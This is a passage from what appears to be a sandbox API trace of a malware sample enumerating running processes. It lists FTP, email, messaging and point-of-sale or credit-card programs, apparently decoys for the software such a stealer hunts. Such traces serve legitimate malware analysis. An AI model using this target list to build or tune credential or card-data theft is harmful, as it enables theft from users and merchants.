cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0085.770] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0085.772] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0085.774] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0085.775] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0085.777] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0085.779] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.781] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.782] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.784] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.785] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.787] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.789] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0085.790] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0085.792] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.794] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0085.796] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0085.798] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.800] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0085.801] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0085.803] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0085.804] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0085.806] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0085.807] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0085.809] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0085.810] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0085.812] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="sufferexistrich.exe")) returned 1 [0085.813] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="have return physical.exe")) returned 1 [0085.815] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or level.exe")) returned 1 [0085.816] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="court camera.exe")) returned 1 [0085.818] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or-finger.exe")) returned 1 [0085.819] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel imagine recently.exe")) returned 1 [0085.821] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="school_for.exe")) returned 1 [0085.823] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whosefirmthe.exe")) returned 1 [0085.825] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="seat_raise_join.exe")) returned 1 [0085.827] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="formerbuildpresent.exe")) returned 1 [0085.828] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="unittype.exe")) returned 1 [0085.830] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow.exe")) returned 1 [0085.831] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="rate.exe")) returned 1 [0085.833] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pushweight.exe")) returned 1 [0085.834] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="film.exe")) returned 1 [0085.836] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="dead.exe")) returned 1 [0085.837] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="than.exe")) returned 1 [0085.838] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0085.840] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0085.844] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0085.846] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0085.847] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0085.848] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0085.850] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0085.852] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0085.853] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0085.855] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0085.858] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0085.860] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0085.862] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0085.864] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0085.866] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0085.868] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0085.869] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0085.871] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0085.873] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0085.875] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0085.876] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0085.878] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x740, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0085.880] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0085.882] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0085.884] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0085.886] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x920, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0085.889] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x928, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0085.891] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0085.893] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0085.894] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0085.896] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0085.897] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0085.899] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0085.900] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0085.902] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0085.903] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0085.905] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0085.906] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0085.908] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0085.909] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0085.911] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0085.912] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0085.914] Process32Next (in: hSnapshot=0x1484, lppe=0x808fa80 | out: lppe=0x808fa80*(dwSize=0x130, cntUsage=0x0, 